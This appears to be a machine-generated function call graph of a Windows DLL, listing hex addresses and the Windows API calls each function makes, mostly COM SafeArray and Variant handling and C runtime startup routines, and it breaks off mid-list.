59280->59284 59281 6cf76987 59283 6cf76994 VariantClear VariantClear 59281->59283 59282 6cf76980 SafeArrayDestroy 59282->59281 59283->59195 59284->59281 59284->59282 59285->59271 59286->59271 59289 6cf7c5a4 59288->59289 59290 6cf7c5ac SafeArrayPutElement VariantClear 59288->59290 59289->59290 59291 6cf7c5cf 59290->59291 59297 6cf7c7e4 59290->59297 59295 6cf7c7d9 59291->59295 59291->59297 59304 6cfb919e 67 API calls 3 library calls 59291->59304 59292 6cf7c7f7 VariantClear VariantClear 59294 6cf7c817 59292->59294 59293 6cf7c7f0 SafeArrayDestroy 59293->59292 59294->59221 59301 6cf7df70 59295->59301 59297->59292 59297->59293 59299->59216 59300->59218 59305 6cf7d410 59301->59305 59303 6cf7df80 59303->59297 59304->59295 59306 6cf7d472 VariantInit VariantInit VariantInit 59305->59306 59318 6cf7d44e _memmove 59305->59318 59306->59318 59307 6cf7d704 VariantClear VariantClear VariantClear 59315 6cf7d75d 59307->59315 59307->59318 59309 6cf7d579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 59309->59318 59310 6cf7d5ec SafeArrayPutElement 59310->59318 59311 6cf7d5d6 SafeArrayUnaccessData 59311->59310 59312 6cf7d633 SafeArrayPutElement VariantClear 59312->59318 59314 6cf7d6fa SafeArrayDestroy 59314->59318 59315->59303 59316 6cf6db30 5 API calls 59316->59318 59317 6cf756b0 83 API calls 59317->59318 59318->59303 59318->59306 59318->59307 59318->59309 59318->59310 59318->59311 59318->59312 59318->59314 59318->59315 59318->59316 59318->59317 59319 6cf76880 9 API calls 59318->59319 59320 6cfb9d66 59318->59320 59337 6cfb9d2c 66 API calls 2 library calls 59318->59337 59319->59318 59321 6cfb9de3 59320->59321 59328 6cfb9d74 59320->59328 59344 6cfbc86e DecodePointer 59321->59344 59323 6cfb9de9 59345 6cfbd7d8 66 API calls __getptd_noexit 59323->59345 59326 6cfb9da2 RtlAllocateHeap 59326->59328 59336 6cfb9ddb 59326->59336 59328->59326 59329 6cfb9d7f 59328->59329 59330 6cfb9dcf 59328->59330 59334 6cfb9dcd 59328->59334 59341 6cfbc86e DecodePointer 59328->59341 59329->59328 59338 6cfbd74e 66 API calls __NMSG_WRITE 59329->59338 59339 6cfbd59f 66 API calls 6 library calls 59329->59339 59340 6cfbd279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 59329->59340 59342 6cfbd7d8 66 API calls __getptd_noexit 59330->59342 59343 6cfbd7d8 66 API calls __getptd_noexit 59334->59343 59336->59318 59337->59318 59338->59329 59339->59329 59341->59328 59342->59334 59343->59336 59344->59323 59345->59336 59346->59235 59347->59242 59348->59239 59349->59243 59350->59250 59351->59249 59352->59262 59885 6cfba42d 59886 6cfba4b8 __mtinitlocknum 59885->59886 59887 6cfba438 59885->59887 59887->59886 59891 6cfba468 59887->59891 59893 6cfba2ab 59887->59893 59889 6cfba498 59889->59886 59890 6cfba2ab __CRT_INIT@12 149 API calls 59889->59890 59890->59886 59891->59886 59891->59889 59892 6cfba2ab __CRT_INIT@12 149 API calls 59891->59892 59892->59889 59894 6cfba2b7 __mtinitlocknum 59893->59894 59895 6cfba339 59894->59895 59896 6cfba2bf 59894->59896 59898 6cfba39a 59895->59898 59899 6cfba33f 59895->59899 59945 6cfbe904 HeapCreate 59896->59945 59900 6cfba3f8 59898->59900 59901 6cfba39f 59898->59901 59905 6cfba35d 59899->59905 59911 6cfba2c8 __mtinitlocknum 59899->59911 59955 6cfbd4e7 66 API calls _doexit 59899->59955 59900->59911 59966 6cfbec2f 79 API calls __freefls@4 59900->59966 59960 6cfbe948 TlsGetValue 59901->59960 59902 6cfba2c4 59904 6cfba2cf 59902->59904 59902->59911 59946 6cfbec9d 86 API calls 4 library calls 59904->59946 59910 6cfba371 59905->59910 59956 6cfbdd67 67 API calls __freea 59905->59956 59959 6cfba384 70 API calls __mtterm 59910->59959 59911->59891 59913 6cfba2d4 __RTC_Initialize 59917 6cfba2d8 59913->59917 59924 6cfba2e4 GetCommandLineA 59913->59924 59916 6cfba3b0 59916->59911 59919 6cfba3bc DecodePointer 59916->59919 59947 6cfbe922 HeapDestroy 59917->59947 59918 6cfba367 59957 6cfbe97c 70 API calls __freea 59918->59957 59925 6cfba3d1 59919->59925 59922 6cfba2dd 59922->59911 59923 6cfba36c 59958 6cfbe922 HeapDestroy 59923->59958 59948 6cfbfc46 71 API calls 2 library calls 59924->59948 59928 6cfba3ec 59925->59928 59929 6cfba3d5 59925->59929 59965 6cfb9d2c 66 API calls 2 library calls 59928->59965 59964 6cfbe9b9 66 API calls 4 library calls 59929->59964 59930 6cfba2f4 59949 6cfbdb22 73 API calls __calloc_crt 59930->59949 59934 6cfba2fe 59936 6cfba302 59934->59936 59951 6cfbfb8b 95 API calls 3 library calls 59934->59951 59935 6cfba3dc GetCurrentThreadId 59935->59911 59950 6cfbe97c 70 API calls __freea 59936->59950 59939 6cfba30e 59940 6cfba322 59939->59940 59952 6cfbf915 94 API calls 6 library calls 59939->59952 59940->59922 59954 6cfbdd67 67 API calls __freea 59940->59954 59943 6cfba317 59943->59940 59953 6cfbd2fa 77 API calls 4 library calls 59943->59953 59945->59902 59946->59913 59947->59922 59948->59930 59949->59934 59950->59917 59951->59939 59952->59943 59953->59940 59954->59936 59955->59905 59956->59918 59957->59923 59958->59910 59959->59911 59961 6cfba3a4 59960->59961 59962 6cfbe95d DecodePointer TlsSetValue 59960->59962 59963 6cfbcb28 66 API calls __calloc_crt 59961->59963 59962->59961 59963->59916 59964->59935 59965->59922 59966->59911 59967 6cf66bc0 59968 6cf66bde 59967->59968 59969 6cf66c26 59968->59969 59977 6cfb9d21 59968->59977 59971 6cf66bf7 59972 6cf66c1d 59971->59972 59981 6cf65300 59971->59981 59976 6cf66c3c 59978 6cfbe8d5 __EH_prolog3_catch 59977->59978 59979 6cfb9bb5 77 API calls 59978->59979 59980 6cfbe8ed _Fac_tidy 59979->59980 59980->59971 59983 6cf65322 59981->59983 59982 6cf65329 59982->59972 59985 6cf66c60 SafeArrayCreateVector SafeArrayAccessData 59982->59985 59983->59982 59989 6cf65840 5 API calls __ehhandler$___std_fs_change_permissions@12 59983->59989 59986 6cf66c91 _memmove 59985->59986 59988 6cf66cad 59985->59988 59987 6cf66c9f SafeArrayUnaccessData 59986->59987 59987->59988 59988->59976 59989->59982 59990 6cf816af 59991 6cf816b4 59990->59991 59992 6cf8170f 59991->59992 59994 6cfb9bb5 77 API calls 59991->59994 59993 6cf81769 59992->59993 59996 6cfb9bb5 77 API calls 59992->59996 59995 6cf817c3 59993->59995 59999 6cfb9bb5 77 API calls 59993->59999 59997 6cf816cd 59994->59997 59998 6cf8181d 59995->59998 60003 6cfb9bb5 77 API calls 59995->60003 60000 6cf81727 59996->60000 60001 6cf816e9 59997->60001 60040 6cf7ea40 59997->60040 60005 6cf81877 59998->60005 60010 6cfb9bb5 77 API calls 59998->60010 60004 6cf81781 59999->60004 60009 6cf7ea40 78 API calls 60000->60009 60016 6cf81743 60000->60016 60045 6cf68400 60001->60045 60006 6cf817db 60003->60006 60013 6cf7ea40 78 API calls 60004->60013 60015 6cf8179d 60004->60015 60008 6cf818d1 60005->60008 60014 6cfb9bb5 77 API calls 60005->60014 60019 6cf7ea40 78 API calls 60006->60019 60021 6cf817f7 60006->60021 60009->60016 60017 6cf81835 60010->60017 60011 6cf68400 77 API calls 60018 6cf8175f 60011->60018 60013->60015 60022 6cf8188f 60014->60022 60023 6cf68400 77 API calls 60015->60023 60016->60011 60024 6cf81851 60017->60024 60025 6cf7ea40 78 API calls 60017->60025 60054 6cf680b0 67 API calls collate 60018->60054 60019->60021 60027 6cf68400 77 API calls 60021->60027 60028 6cf818ab 60022->60028 60032 6cf7ea40 78 API calls 60022->60032 60029 6cf817b9 60023->60029 60030 6cf68400 77 API calls 60024->60030 60025->60024 60031 6cf81813 60027->60031 60034 6cf68400 77 API calls 60028->60034 60055 6cf680b0 67 API calls collate 60029->60055 60035 6cf8186d 60030->60035 60056 6cf680b0 67 API calls collate 60031->60056 60032->60028 60037 6cf818c7 60034->60037 60057 6cf680b0 67 API calls collate 60035->60057 60058 6cf680b0 67 API calls collate 60037->60058 60041 6cfb9bb5 77 API calls 60040->60041 60042 6cf7ea6b 60041->60042 60043 6cf7ea7e SysAllocString 60042->60043 60044 6cf7ea99 60042->60044 60043->60044 60044->60001 60046 6cfb9bb5 77 API calls 60045->60046 60047 6cf6840d 60046->60047 60048 6cf68416 60047->60048 60059 6cfb9533 66 API calls std::exception::_Copy_str 60047->60059 60053 6cf680b0 67 API calls collate 60048->60053 60050 6cf6844e 60060 6cfbac75 RaiseException 60050->60060 60052 6cf68463 60053->59992 60054->59993 60055->59995 60056->59998 60057->60005 60058->60008 60059->60050 60060->60052 59353 3392930 59354 3392947 59353->59354 59355 339294e 59353->59355 59354->59355 59357 3398c43 59354->59357 59358 3398c74 59357->59358 59359 3398c7e 59357->59359 59358->59359 59361 33991c9 59358->59361 59359->59355 59362 33991d4 59361->59362 59366 3399dd8 59362->59366 59370 3399de0 59362->59370 59363 3399272 59363->59359 59367 3399e24 59366->59367 59374 6cf82ed0 59367->59374 59368 3399e6b 59368->59363 59371 3399e24 59370->59371 59373 6cf82ed0 327 API calls 59371->59373 59372 3399e6b 59372->59363 59373->59372 59375 6cf82f09 59374->59375 59395 6cf83006 collate 59374->59395 59376 6cfb9bb5 77 API calls 59375->59376 59377 6cf82f31 59376->59377 59378 6cfb9bb5 77 API calls 59377->59378 59379 6cf82f54 59378->59379 59380 6cf65050 77 API calls 59379->59380 59381 6cf82f6e 59380->59381 59382 6cfb9bb5 77 API calls 59381->59382 59383 6cf82f75 59382->59383 59384 6cf65050 77 API calls 59383->59384 59385 6cf82f8f 59384->59385 59386 6cfb9bb5 77 API calls 59385->59386 59387 6cf82f96 59386->59387 59388 6cf65050 77 API calls 59387->59388 59389 6cf82fb0 59388->59389 59390 6cfb9bb5 77 API calls 59389->59390 59391 6cf82fb7 59390->59391 59392 6cf65050 77 API calls 59391->59392 59393 6cf82fd1 59392->59393 59396 6cf616b0 59393->59396 59395->59368 59397 6cfb9bb5 77 API calls 59396->59397 59398 6cf61706 59397->59398 59399 6cf61711 59398->59399 59400 6cf61c39 59398->59400 59460 6cf62d70 59399->59460 59512 6cfb9533 66 API calls std::exception::_Copy_str 59400->59512 59404 6cf61c48 59513 6cfbac75 RaiseException 59404->59513 59406 6cf62d70 77 API calls 59408 6cf61788 59406->59408 59407 6cf61c5d 59409 6cf62d70 77 API calls 59408->59409 59410 6cf617a9 59409->59410 59411 6cf62d70 77 API calls 59410->59411 59412 6cf617ca 59411->59412 59413 6cf62d70 77 API calls 59412->59413 59414 6cf617e6 59413->59414 59415 6cf62d70 77 API calls 59414->59415 59416 6cf6182f 59415->59416 59417 6cf62d70 77 API calls 59416->59417 59418 6cf61878 59417->59418 59419 6cf62d70 77 API calls 59418->59419 59420 6cf618c6 59419->59420 59421 6cf62d70 77 API calls 59420->59421 59422 6cf618e7 59421->59422 59423 6cf62d70 77 API calls 59422->59423 59424 6cf61900 59423->59424 59425 6cf62d70 77 API calls 59424->59425 59426 6cf61946 59425->59426 59427 6cf62d70 77 API calls 59426->59427 59428 6cf6198f 59427->59428 59429 6cf62d70 77 API calls 59428->59429 59430 6cf619d3 59429->59430 59431 6cf62d70 77 API calls 59430->59431 59432 6cf61a05 59431->59432 59468 6cf63b30 59432->59468 59435 6cf62d70 77 API calls 59436 6cf61a21 59435->59436 59437 6cf62d70 77 API calls 59436->59437 59438 6cf61a82 59437->59438 59477 6cf63bd0 59438->59477 59441 6cf62d70 77 API calls 59442 6cf61a9e 59441->59442 59443 6cf62d70 77 API calls 59442->59443 59444 6cf61aec 59443->59444 59486 6cf62a80 59444->59486 59446 6cf61b4c 59447 6cf61b62 59446->59447 59509 6cfb919e 67 API calls 3 library calls 59446->59509 59492 6cf66850 59447->59492 59496 6cf842e0 59447->59496 59500 6cf669e0 59447->59500 59504 6cf830c0 59447->59504 59448 6cf61b58 59510 6cfb9125 67 API calls 2 library calls 59448->59510 59452 6cf61b00 59452->59446 59452->59448 59453 6cf61b6d collate 59452->59453 59508 6cf62e60 77 API calls __ehhandler$___std_fs_change_permissions@12 59452->59508 59511 6cf63530 67 API calls 59453->59511 59455 6cf61ba1 collate 59455->59395 59461 6cf62db8 59460->59461 59466 6cf62e0d 59461->59466 59514 6cf55a30 77 API calls 2 library calls 59461->59514 59463 6cf62e02 59515 6cf63cc0 67 API calls 59463->59515 59465 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 59467 6cf61746 59465->59467 59466->59465 59467->59406 59469 6cf63b3d 59468->59469 59470 6cfb9bb5 77 API calls 59469->59470 59471 6cf63b6f 59470->59471 59472 6cf61a0c 59471->59472 59516 6cfb9533 66 API calls std::exception::_Copy_str 59471->59516 59472->59435 59474 6cf63bae 59517 6cfbac75 RaiseException 59474->59517 59476 6cf63bc3 59478 6cf63bdd 59477->59478 59479 6cfb9bb5 77 API calls 59478->59479 59480 6cf63c0f 59479->59480 59481 6cf61a89 59480->59481 59518 6cfb9533 66 API calls std::exception::_Copy_str 59480->59518 59481->59441 59483 6cf63c4e 59519 6cfbac75 RaiseException 59483->59519 59485 6cf63c63 59487 6cf62ae6 59486->59487 59488 6cf62acd 59486->59488 59487->59452 59489 6cf62adf 59488->59489 59520 6cfb90d8 67 API calls 2 library calls 59488->59520 59521 6cf631e0 77 API calls 2 library calls 59489->59521 59493 6cf66890 59492->59493 59494 6cf6686e 59492->59494 59493->59453 59522 6cf68bc0 59494->59522 59497 6cf842fe 59496->59497 59498 6cf8431d 59496->59498 59704 6cf662c0 59497->59704 59498->59453 59501 6cf66a1f 59500->59501 59502 6cf669fe 59500->59502 59501->59453 59731 6cf69110 59502->59731 59505 6cf830de 59504->59505 59506 6cf830f8 59504->59506 59856 6cf65fa0 59505->59856 59506->59453 59508->59452 59509->59448 59510->59447 59511->59455 59512->59404 59513->59407 59514->59463 59515->59466 59516->59474 59517->59476 59518->59483 59519->59485 59520->59489 59521->59487 59523 6cf68bd5 EnterCriticalSection 59522->59523 59524 6cf68bcc 59522->59524 59532 6cf7e030 59523->59532 59524->59493 59528 6cf68c13 LeaveCriticalSection 59528->59493 59533 6cf7e090 59532->59533 59534 6cf7e05d 59532->59534 59536 6cfb9bb5 77 API calls 59533->59536 59535 6cf68bec 59534->59535 59537 6cfb9bb5 77 API calls 59534->59537 59538 6cf6b6c0 GetModuleHandleW 59535->59538 59536->59535 59537->59535 59539 6cf6b717 LoadLibraryW 59538->59539 59540 6cf6b72a GetProcAddress 59538->59540 59539->59540 59541 6cf6b94c 59539->59541 59540->59541 59544 6cf6b73e 59540->59544 59542 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 59541->59542 59543 6cf68bfa 59542->59543 59543->59528 59551 6cf68c40 59543->59551 59544->59541 59545 6cf6b85d 59544->59545 59565 6cfba116 80 API calls __mbstowcs_s_l 59545->59565 59547 6cf6b875 GetModuleHandleW 59547->59541 59548 6cf6b8aa GetProcAddress 59547->59548 59548->59541 59550 6cf6b8f2 59548->59550 59550->59541 59566 6cf6a350 VariantInit VariantInit VariantInit 59551->59566 59552 6cf68c63 59553 6cf68cf9 59552->59553 59576 6cf68b10 EnterCriticalSection 59552->59576 59553->59528 59555 6cf68c83 59556 6cf68ce2 59555->59556 59557 6cf68c9f 59555->59557 59585 6cf6b9a0 59555->59585 59556->59528 59593 6cf6bab0 59557->59593 59560 6cf68cd3 59560->59556 59609 6cf68ff0 69 API calls std::tr1::_Xweak 59560->59609 59565->59547 59570 6cf6a3b5 59566->59570 59567 6cf6a505 VariantClear VariantClear VariantClear 59568 6cf6a52a 59567->59568 59568->59552 59569 6cf6a3e0 VariantCopy 59571 6cf6a3ff VariantClear 59569->59571 59572 6cf6a3f9 59569->59572 59570->59567 59570->59569 59573 6cf6a413 59571->59573 59572->59571 59573->59567 59574 6cf6a549 VariantClear VariantClear VariantClear 59573->59574 59575 6cf6a57a 59574->59575 59575->59552 59577 6cf68b4b 59576->59577 59579 6cfb9bb5 77 API calls 59577->59579 59584 6cf68b53 LeaveCriticalSection 59577->59584 59580 6cf68b64 59579->59580 59581 6cf68b80 59580->59581 59610 6cf67370 79 API calls 2 library calls 59580->59610 59611 6cf696d0 77 API calls 59581->59611 59584->59555 59586 6cf6b9dc 59585->59586 59587 6cf6ba7a 59586->59587 59588 6cfb9bb5 77 API calls 59586->59588 59587->59557 59589 6cf6ba3a 59588->59589 59590 6cf6ba6a 59589->59590 59656 6cf75f00 77 API calls 2 library calls 59589->59656 59612 6cf76fd0 59590->59612 59657 6cf7b580 59593->59657 59595 6cf6baf3 59596 6cf68cbd 59595->59596 59662 6cf6af30 VariantInit VariantInit VariantInit 59595->59662 59596->59556 59600 6cf68d60 EnterCriticalSection 59596->59600 59598 6cf6bb0d 59598->59596 59599 6cfb9bb5 77 API calls 59598->59599 59599->59596 59682 6cf69750 59600->59682 59603 6cf68d97 59604 6cf68e0a 59603->59604 59605 6cf68de5 59603->59605 59684 6cf6bdf7 59603->59684 59604->59560 59694 6cf68e20 59605->59694 59607 6cf68e02 59607->59560 59609->59556 59610->59581 59611->59584 59615 6cf7700a 59612->59615 59624 6cf778c2 59612->59624 59613 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 59614 6cf78326 59613->59614 59614->59587 59616 6cf6d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59615->59616 59615->59624 59617 6cf778b5 59616->59617 59618 6cf6d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59617->59618 59617->59624 59619 6cf77920 59618->59619 59620 6cf6d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59619->59620 59619->59624 59621 6cf77986 59620->59621 59622 6cf6d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59621->59622 59623 6cf779df 59621->59623 59622->59623 59623->59624 59625 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59623->59625 59624->59613 59626 6cf77a7b 59625->59626 59626->59624 59627 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59626->59627 59628 6cf77acb 59627->59628 59628->59624 59629 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59628->59629 59630 6cf77b19 59629->59630 59630->59624 59631 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59630->59631 59632 6cf77b90 59631->59632 59632->59624 59633 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59632->59633 59634 6cf77c0b 59633->59634 59634->59624 59635 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59634->59635 59636 6cf77ca5 59635->59636 59636->59624 59637 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59636->59637 59638 6cf77d3f 59637->59638 59638->59624 59639 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59638->59639 59640 6cf77dbb 59639->59640 59640->59624 59641 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59640->59641 59642 6cf77e44 59641->59642 59642->59624 59643 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59642->59643 59644 6cf77eb5 59643->59644 59644->59624 59645 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59644->59645 59646 6cf77f6e 59645->59646 59646->59624 59647 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59646->59647 59648 6cf78081 59647->59648 59648->59624 59649 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59648->59649 59650 6cf780ca 59649->59650 59650->59624 59651 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59650->59651 59652 6cf780f9 59651->59652 59652->59624 59653 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59652->59653 59654 6cf78175 59653->59654 59654->59624 59655 6cf6d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59654->59655 59655->59624 59656->59590 59658 6cf7b5b5 59657->59658 59659 6cf7b5cb VariantInit VariantInit 59657->59659 59658->59595 59661 6cf7b5ee 59659->59661 59660 6cf7b675 VariantClear VariantClear 59660->59595 59661->59660 59665 6cf6af97 59662->59665 59663 6cf6b22c VariantClear VariantClear VariantClear 59664 6cf6b254 59663->59664 59664->59598 59665->59663 59666 6cf6affe VariantCopy 59665->59666 59667 6cf6b017 59666->59667 59668 6cf6b01d VariantClear 59666->59668 59667->59668 59669 6cf6b035 59668->59669 59669->59663 59670 6cfb9bb5 77 API calls 59669->59670 59671 6cf6b0ae 59670->59671 59672 6cfba136 __NMSG_WRITE 66 API calls 59671->59672 59673 6cf6b108 59672->59673 59674 6cf6b190 SafeArrayGetLBound SafeArrayGetUBound 59673->59674 59675 6cf6b28d VariantClear VariantClear VariantClear 59673->59675 59679 6cf6b1fd collate 59673->59679 59677 6cf6b1bf SafeArrayAccessData 59674->59677 59678 6cf6b28b 59674->59678 59676 6cf6b2ba 59675->59676 59676->59598 59677->59678 59680 6cf6b1d3 _memmove 59677->59680 59678->59675 59679->59663 59681 6cf6b1eb SafeArrayUnaccessData 59680->59681 59681->59678 59681->59679 59683 6cf68d88 LeaveCriticalSection 59682->59683 59683->59603 59683->59604 59685 6cf6be01 59684->59685 59686 6cf6be2c SafeArrayDestroy 59685->59686 59687 6cf6be33 59685->59687 59686->59687 59689 6cf6befd collate 59687->59689 59690 6cf6be6a IsBadReadPtr 59687->59690 59693 6cf6be77 59687->59693 59688 6cf6af30 92 API calls 59688->59689 59691 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 59689->59691 59690->59693 59692 6cf6c00f 59691->59692 59692->59605 59693->59688 59695 6cf68e39 59694->59695 59696 6cf68e7c EnterCriticalSection 59695->59696 59697 6cf68f7f collate 59695->59697 59698 6cf68e9e 59696->59698 59697->59607 59699 6cf68eac LeaveCriticalSection 59698->59699 59699->59697 59700 6cf68ebd 59699->59700 59701 6cfb9bb5 77 API calls 59700->59701 59702 6cf68ec4 _memset 59701->59702 59703 6cf6c020 246 API calls 59702->59703 59703->59697 59705 6cfb9bb5 77 API calls 59704->59705 59706 6cf6632b 59705->59706 59707 6cfb9bb5 77 API calls 59706->59707 59708 6cf66350 59707->59708 59709 6cf65050 77 API calls 59708->59709 59710 6cf6636e 59709->59710 59711 6cfb9bb5 77 API calls 59710->59711 59712 6cf66375 59711->59712 59713 6cf65050 77 API calls 59712->59713 59714 6cf66392 59713->59714 59715 6cfb9bb5 77 API calls 59714->59715 59716 6cf66399 59715->59716 59717 6cf65050 77 API calls 59716->59717 59718 6cf663b3 59717->59718 59719 6cfb9bb5 77 API calls 59718->59719 59720 6cf663c9 59719->59720 59721 6cf663d4 59720->59721 59722 6cf66459 59720->59722 59724 6cf616b0 327 API calls 59721->59724 59729 6cfb9533 66 API calls std::exception::_Copy_str 59722->59729 59728 6cf66402 collate 59724->59728 59725 6cf6646b 59730 6cfbac75 RaiseException 59725->59730 59727 6cf66482 59728->59498 59729->59725 59730->59727 59732 6cf69121 59731->59732 59733 6cf6912c EnterCriticalSection 59731->59733 59732->59501 59734 6cf69150 59733->59734 59735 6cf6915b LeaveCriticalSection 59734->59735 59736 6cf6923f 59735->59736 59737 6cf6916a EnterCriticalSection 59735->59737 59736->59501 59738 6cf69185 59737->59738 59739 6cf69190 LeaveCriticalSection 59738->59739 59739->59736 59740 6cf691a1 59739->59740 59747 6cf76b10 59740->59747 59751 6cf76b64 59747->59751 59748 6cf76f19 InterlockedCompareExchange 59750 6cf691f3 59748->59750 59750->59736 59818 6cf69840 59750->59818 59751->59748 59833 6cf82e20 59751->59833 59753 6cf76f12 SafeArrayDestroy 59753->59748 59754 6cf76bc2 59754->59748 59817 6cf76edd 59754->59817 59836 6cf828c0 InterlockedCompareExchange 59754->59836 59756 6cf76c6b 59756->59748 59757 6cf76c7e SafeArrayGetLBound 59756->59757 59756->59817 59758 6cf76c99 SafeArrayGetUBound 59757->59758 59757->59817 59759 6cf76cb4 SafeArrayAccessData 59758->59759 59758->59817 59760 6cf76cd5 59759->59760 59759->59817 59837 6cf75760 67 API calls std::tr1::_Xweak 59760->59837 59762 6cf76cf5 SafeArrayUnaccessData 59763 6cf76d07 59762->59763 59762->59817 59763->59817 59838 6cf61690 77 API calls 59763->59838 59765 6cf76d2c 59766 6cfb9bb5 77 API calls 59765->59766 59767 6cf76d3f 59766->59767 59768 6cf65050 77 API calls 59767->59768 59769 6cf76d59 59768->59769 59770 6cfb9bb5 77 API calls 59769->59770 59771 6cf76d63 59770->59771 59772 6cf65050 77 API calls 59771->59772 59773 6cf76d7f 59772->59773 59774 6cfb9bb5 77 API calls 59773->59774 59775 6cf76d86 59774->59775 59776 6cf65050 77 API calls 59775->59776 59777 6cf76da0 59776->59777 59839 6cf650c0 77 API calls 59777->59839 59779 6cf76dab 59780 6cfb9bb5 77 API calls 59779->59780 59781 6cf76db2 59780->59781 59782 6cf65050 77 API calls 59781->59782 59783 6cf76dcf 59782->59783 59840 6cf650c0 77 API calls 59783->59840 59785 6cf76dda 59786 6cfb9bb5 77 API calls 59785->59786 59787 6cf76de7 59786->59787 59788 6cf65050 77 API calls 59787->59788 59789 6cf76e01 59788->59789 59841 6cf650c0 77 API calls 59789->59841 59791 6cf76e0c 59792 6cfb9bb5 77 API calls 59791->59792 59793 6cf76e19 59792->59793 59794 6cf65050 77 API calls 59793->59794 59795 6cf76e33 59794->59795 59796 6cfb9bb5 77 API calls 59795->59796 59797 6cf76e3a 59796->59797 59798 6cf65050 77 API calls 59797->59798 59799 6cf76e58 59798->59799 59800 6cfb9bb5 77 API calls 59799->59800 59801 6cf76e5f 59800->59801 59802 6cf65050 77 API calls 59801->59802 59803 6cf76e79 59802->59803 59842 6cf650c0 77 API calls 59803->59842 59805 6cf76e84 59843 6cf650c0 77 API calls 59805->59843 59807 6cf76e8f 59808 6cfb9bb5 77 API calls 59807->59808 59809 6cf76e9b 59808->59809 59810 6cf65050 77 API calls 59809->59810 59811 6cf76eb5 59810->59811 59844 6cf650c0 77 API calls 59811->59844 59813 6cf76ec0 59845 6cf650c0 77 API calls 59813->59845 59815 6cf76ecb 59846 6cf62a40 327 API calls 59815->59846 59817->59748 59817->59753 59819 6cfb9bb5 77 API calls 59818->59819 59820 6cf69865 59819->59820 59821 6cf69227 59820->59821 59847 6cfb9533 66 API calls std::exception::_Copy_str 59820->59847 59826 6cf67140 59821->59826 59823 6cf698ab 59848 6cfbac75 RaiseException 59823->59848 59825 6cf698c0 59849 6cf82820 59826->59849 59828 6cf6719c 59832 6cf671d7 59828->59832 59854 6cfb919e 67 API calls 3 library calls 59828->59854 59831 6cf671f8 59831->59501 59832->59831 59855 6cfb9d2c 66 API calls 2 library calls 59832->59855 59834 6cf82e67 59833->59834 59834->59754 59835 6cf82e9f InterlockedCompareExchange 59834->59835 59835->59754 59836->59756 59837->59762 59838->59765 59839->59779 59840->59785 59841->59791 59842->59805 59843->59807 59844->59813 59845->59815 59846->59817 59847->59823 59848->59825 59850 6cf82845 59849->59850 59851 6cf828af 59850->59851 59852 6cfb9d66 _malloc 66 API calls 59850->59852 59851->59828 59853 6cf82876 59852->59853 59853->59828 59854->59832 59855->59831 59857 6cfb9bb5 77 API calls 59856->59857 59858 6cf66003 59857->59858 59859 6cfb9bb5 77 API calls 59858->59859 59860 6cf66028 59859->59860 59861 6cf65050 77 API calls 59860->59861 59862 6cf66042 59861->59862 59863 6cfb9bb5 77 API calls 59862->59863 59864 6cf66049 59863->59864 59865 6cf65050 77 API calls 59864->59865 59866 6cf66067 59865->59866 59867 6cfb9bb5 77 API calls 59866->59867 59868 6cf6606e 59867->59868 59869 6cf65050 77 API calls 59868->59869 59870 6cf6608b 59869->59870 59871 6cfb9bb5 77 API calls 59870->59871 59872 6cf66092 59871->59872 59873 6cf65050 77 API calls 59872->59873 59874 6cf660ac 59873->59874 59875 6cf616b0 327 API calls 59874->59875 59876 6cf660de collate 59875->59876 59876->59506 60061 6cf7e2ce 60062 6cfb9bb5 77 API calls 60061->60062 60063 6cf7e2d5 60062->60063 60064 6cf7e2ee 60063->60064 60118 6cf81fd0 60063->60118 60068 6cfb9bb5 77 API calls 60064->60068 60078 6cf7e343 60064->60078 60066 6cf7e3a6 60073 6cfb9bb5 77 API calls 60066->60073 60117 6cf7e564 collate 60066->60117 60067 6cf7e360 60069 6cfb9bb5 77 API calls 60067->60069 60070 6cf7e327 60068->60070 60071 6cf7e367 60069->60071 60143 6cf7eae0 60070->60143 60158 6cf81910 78 API calls 2 library calls 60071->60158 60072 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60075 6cf7e76e 60072->60075 60074 6cf7e400 60073->60074 60080 6cfb9bb5 77 API calls 60074->60080 60078->60066 60078->60067 60079 6cf7e384 60159 6cf81b20 11 API calls __ehhandler$___std_fs_change_permissions@12 60079->60159 60081 6cf7e428 60080->60081 60084 6cf65050 77 API calls 60081->60084 60083 6cf7e399 60083->60066 60085 6cf7e442 60084->60085 60086 6cfb9bb5 77 API calls 60085->60086 60087 6cf7e449 60086->60087 60088 6cf65050 77 API calls 60087->60088 60089 6cf7e463 60088->60089 60090 6cfb9bb5 77 API calls 60089->60090 60091 6cf7e46a 60090->60091 60092 6cf65050 77 API calls 60091->60092 60093 6cf7e484 60092->60093 60094 6cfb9bb5 77 API calls 60093->60094 60095 6cf7e48b 60094->60095 60096 6cf65050 77 API calls 60095->60096 60097 